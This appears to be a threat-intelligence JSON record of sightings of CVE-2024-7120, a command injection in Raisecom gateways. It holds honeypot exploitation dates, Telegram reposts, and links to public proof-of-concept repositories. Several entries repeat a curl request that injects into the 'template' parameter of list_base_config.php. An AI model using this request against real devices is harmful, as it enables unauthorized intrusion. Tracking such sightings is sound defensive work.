{"vulnerability": "CVE-2024-7120", "sightings": [{"uuid": "2be2b503-fc7f-4ef5-a69b-942e57bbdba6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-7120", "type": "seen", "source": "https://bsky.app/profile/aakl.bsky.social/post/3lg72ulm2bc2u", "content": "", "creation_timestamp": "2025-01-20T19:24:22.822140Z"}, {"uuid": "2814f0e6-39a5-4340-8e07-c8912eebb08d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-7120", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-03)", "content": "", "creation_timestamp": "2025-02-03T00:00:00.000000Z"}, {"uuid": "e9acd43c-08ee-49c1-9f84-4f8d89b1d386", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-7120", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-10-24)", "content": "", "creation_timestamp": "2024-10-24T00:00:00.000000Z"}, {"uuid": "65d1c8f7-19ac-4cac-8f97-52e1be75a72b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-7120", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-06)", "content": "", "creation_timestamp": "2025-03-06T00:00:00.000000Z"}, {"uuid": "098a3ffa-0593-4cac-be80-8d45c261b871", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-7120", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-18)", "content": "", "creation_timestamp": "2026-02-18T00:00:00.000000Z"}, {"uuid": "ab48bc73-aded-416b-bbbd-b8cff0107491", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-7120", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-19)", "content": "", "creation_timestamp": "2025-06-19T00:00:00.000000Z"}, {"uuid": "14d61e11-d2c1-42b2-95e6-84d9f93a5fa6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-7120", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-10-01)", "content": "", "creation_timestamp": "2025-10-01T00:00:00.000000Z"}, {"uuid": "27c5762f-8e55-4c6a-8e83-b1533a447cee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-7120", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-18)", "content": "", "creation_timestamp": "2026-03-18T00:00:00.000000Z"}, {"uuid": "c4299f48-b57d-4f6b-a1ab-58ff5edee238", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-7120", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-14)", "content": "", "creation_timestamp": "2026-02-14T00:00:00.000000Z"}, {"uuid": "94c28354-1e0c-4f2c-8e17-c42b98464ef5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-7120", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-23)", "content": "", "creation_timestamp": "2026-03-23T00:00:00.000000Z"}, {"uuid": "bd2438e7-cd4f-47d3-9ccb-34a2b6ff6bc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-7120", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/447", "content": "#exploit\n1. CVE-2024-9043:\nCellopoint Secure Email Gateway - Buffer Overflow in authentication process\nhttps://github.com/maybeheisenberg/CVE-2024-9043\n\n2. CVE-2024-7120:\nRaisecom Command Injection\nhttps://github.com/codeb0ss/CVE-2024-7120-PoC\n]-> https://github.com/fa-rrel/CVE-2024-7120\n\n3. CVE-2024-20439/\nCVE-2024-20440:\nCisco Smart Licensing Utility Static Credential/Information Disclosure\nhttps://starkeblog.com/cve-wednesday/cisco/2024/09/20/cve-wednesday-cve-2024-20439.html", "creation_timestamp": "2024-09-25T14:59:40.000000Z"}, {"uuid": "09a1a308-8f8c-4ba3-87a1-767820d95411", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-7120", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-10)", "content": "", "creation_timestamp": "2026-04-10T00:00:00.000000Z"}, {"uuid": "546beccc-2c14-4a96-b649-ffca9edf565f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-7120", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8148", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aMass Exploit < [CVE-2024-7120 - Raisecom] - Command Injection\nURL\uff1ahttps://github.com/codeb0ss/CVE-2024-7120-PoC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-01T17:42:00.000000Z"}, {"uuid": "4b532f23-7591-4631-be3e-2b573229c66c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-7120", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/92", "content": "CVE-2024-7120 RAISECOM Gateway Devices\n*\nWriteUp\n*\nExploit command injection\ncurl 'http:///vpn/list_base_config.php?type=mod&parts=base_config&template=``' \\\n  -H 'Accept: */*' \\\n  -H 'Accept-Encoding: gzip, deflate' \\\n  -H 'Connection: keep-alive'", "creation_timestamp": "2024-08-01T13:53:33.000000Z"}, {"uuid": "3e468ba3-de9c-4e90-ad8d-17e10da599fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-7120", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8417", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1a\u26a0\ufe0f\u26a0\ufe0f CVE-2024-7120 Command Injection Vulnerability in RAISECOM Gateway Devices\nURL\uff1ahttps://github.com/fa-rrel/CVE-2024-7120\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-30T15:55:00.000000Z"}, {"uuid": "38ef9601-2068-44d5-8573-04cd31a310a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-7120", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/1885", "content": "#poc #exploit", "creation_timestamp": "2024-09-01T07:16:35.000000Z"}, {"uuid": "0730438e-37fb-47cc-b7be-0f2547ea2b0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-7120", "type": "seen", "source": "https://t.me/jokeir7x0/1796", "content": "\ud83e\udd21how Raisecom Devices Command Injection (CVE-2024-7120) \ud83e\udd21", "creation_timestamp": "2025-01-03T14:22:17.000000Z"}, {"uuid": "dc306933-6f08-4540-9339-9125e1000abb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-7120", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/18319", "content": "#poc #exploit", "creation_timestamp": "2024-09-01T16:43:33.000000Z"}, {"uuid": "b8b08c72-f2a9-4aee-9606-47380c140df6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-7120", "type": "published-proof-of-concept", "source": "https://t.me/ton618cyber/1340", "content": "#exploit\n1. CVE-2024-9043:\nCellopoint Secure Email Gateway - Buffer Overflow in authentication process\nhttps://github.com/maybeheisenberg/CVE-2024-9043\n\n2. CVE-2024-7120:\nRaisecom Command Injection\nhttps://github.com/codeb0ss/CVE-2024-7120-PoC\n]-> https://github.com/fa-rrel/CVE-2024-7120\n\n3. CVE-2024-20439/\nCVE-2024-20440:\nCisco Smart Licensing Utility Static Credential/Information Disclosure\nhttps://starkeblog.com/cve-wednesday/cisco/2024/09/20/cve-wednesday-cve-2024-20439.html", "creation_timestamp": "2024-09-25T13:30:44.000000Z"}, {"uuid": "b1e67f32-0bf2-4bc2-b037-339bd0d040ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-7120", "type": "seen", "source": "https://t.me/cvedetector/1667", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-7120 - Raisecom MSG Series Web Interface OS Command Injection Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-7120 \nPublished : July 26, 2024, 5:15 a.m. | 38\u00a0minutes ago \nDescription : A vulnerability, which was classified as critical, was found in Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90. This affects an unknown part of the file list_base_config.php of the component Web Interface. The manipulation of the argument template leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272451. \nSeverity: 6.3 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"26 Jul 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-07-26T07:58:21.000000Z"}, {"uuid": "ad5bafa0-3564-455e-bddb-e7c1a0af6839", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-7120", "type": "published-proof-of-concept", "source": "https://t.me/ton618cyber/4491", "content": "#exploit\n1. CVE-2024-9043:\nCellopoint Secure Email Gateway - Buffer Overflow in authentication process\nhttps://github.com/maybeheisenberg/CVE-2024-9043\n\n2. CVE-2024-7120:\nRaisecom Command Injection\nhttps://github.com/codeb0ss/CVE-2024-7120-PoC\n]-> https://github.com/fa-rrel/CVE-2024-7120\n\n3. CVE-2024-20439/\nCVE-2024-20440:\nCisco Smart Licensing Utility Static Credential/Information Disclosure\nhttps://starkeblog.com/cve-wednesday/cisco/2024/09/20/cve-wednesday-cve-2024-20439.html", "creation_timestamp": "2024-09-25T13:30:44.000000Z"}, {"uuid": "e616c868-55ed-4e56-9853-f7648000e177", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-7120", "type": "published-proof-of-concept", "source": "https://t.me/Kelvinseccommunity/679", "content": "CVE-2024-7120 RAISECOM Gateway Devices\n*\nWriteUp\n*\nExploit command injection\ncurl 'http:///vpn/list_base_config.php?type=mod&parts=base_config&template=``' \\\n  -H 'Accept: */*' \\\n  -H 'Accept-Encoding: gzip, deflate' \\\n  -H 'Connection: keep-alive'", "creation_timestamp": "2024-08-01T13:54:17.000000Z"}, {"uuid": "fa7d2788-fab7-467b-be0a-999c4d2916c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-7120", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2199", "content": "CVE-2024-7120 RAISECOM Gateway Devices\n*\nWriteUp\n*\nExploit command injection\ncurl 'http:///vpn/list_base_config.php?type=mod&parts=base_config&template=``' \\\n  -H 'Accept: */*' \\\n  -H 'Accept-Encoding: gzip, deflate' \\\n  -H 'Connection: keep-alive'", "creation_timestamp": "2024-08-01T10:24:33.000000Z"}, {"uuid": "b0f8a582-8853-41bf-8cea-0e6fbf423145", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-7120", "type": "published-proof-of-concept", "source": "https://t.me/codeb0ss/1533", "content": "https://nvd.nist.gov/vuln/detail/CVE-2024-7120", "creation_timestamp": "2024-09-07T05:42:04.000000Z"}, {"uuid": "004cbf1e-e128-4559-939e-719a10a8dfe3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-7120", "type": "seen", "source": "https://t.me/ctinow/223980", "content": "Exploitation of RAISECOM Gateway Devices Vulnerability CVE-2024-7120, (Tue, Sep 24th)\nhttps://ift.tt/Joj0lSp", "creation_timestamp": "2024-09-24T16:44:57.000000Z"}, {"uuid": "f28b7ad4-a700-4176-a21a-10e1378b889e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-7120", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2933", "content": "https://netsecfish.notion.site/Command-Injection-Vulnerability-in-RAISECOM-Gateway-Devices-673bc7d2f8db499f9de7182d4706c707\n\nCommand Injection Vulnerability in RAISECOM Gateway Devices cve-2024-7120\n#\u5206\u6790 #poc", "creation_timestamp": "2024-08-01T14:27:01.000000Z"}, {"uuid": "12976cc5-4d85-48c8-b17b-c295bb836590", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-7120", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/3086", "content": "#poc #exploit", "creation_timestamp": "2024-08-30T05:42:23.000000Z"}, {"uuid": "dae04b10-5a0b-4177-967c-1dda2e93f5b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-7120", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/3217", "content": "https://github.com/fa-rrel/CVE-2024-7120\n\nCVE-2024-7120 Command Injection Vulnerability in RAISECOM Gateway Devices\n#github #exploit", "creation_timestamp": "2024-09-25T16:22:36.000000Z"}, {"uuid": "d9ebf707-02e7-4e20-9ca2-5d8ebbace8da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-7120", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/11189", "content": "#exploit\n1. CVE-2024-9043:\nCellopoint Secure Email Gateway - Buffer Overflow in authentication process\nhttps://github.com/maybeheisenberg/CVE-2024-9043\n\n2. CVE-2024-7120:\nRaisecom Command Injection\nhttps://github.com/codeb0ss/CVE-2024-7120-PoC\n]-> https://github.com/fa-rrel/CVE-2024-7120\n\n3. CVE-2024-20439/\nCVE-2024-20440:\nCisco Smart Licensing Utility Static Credential/Information Disclosure\nhttps://starkeblog.com/cve-wednesday/cisco/2024/09/20/cve-wednesday-cve-2024-20439.html", "creation_timestamp": "2024-09-25T22:02:36.000000Z"}, {"uuid": "1f6dc7c8-fc4b-4710-8e0c-e8fe629039df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-7120", "type": "published-proof-of-concept", "source": "https://t.me/BackupLulz/231", "content": "#poc #exploit", "creation_timestamp": "2024-11-03T04:41:27.000000Z"}]}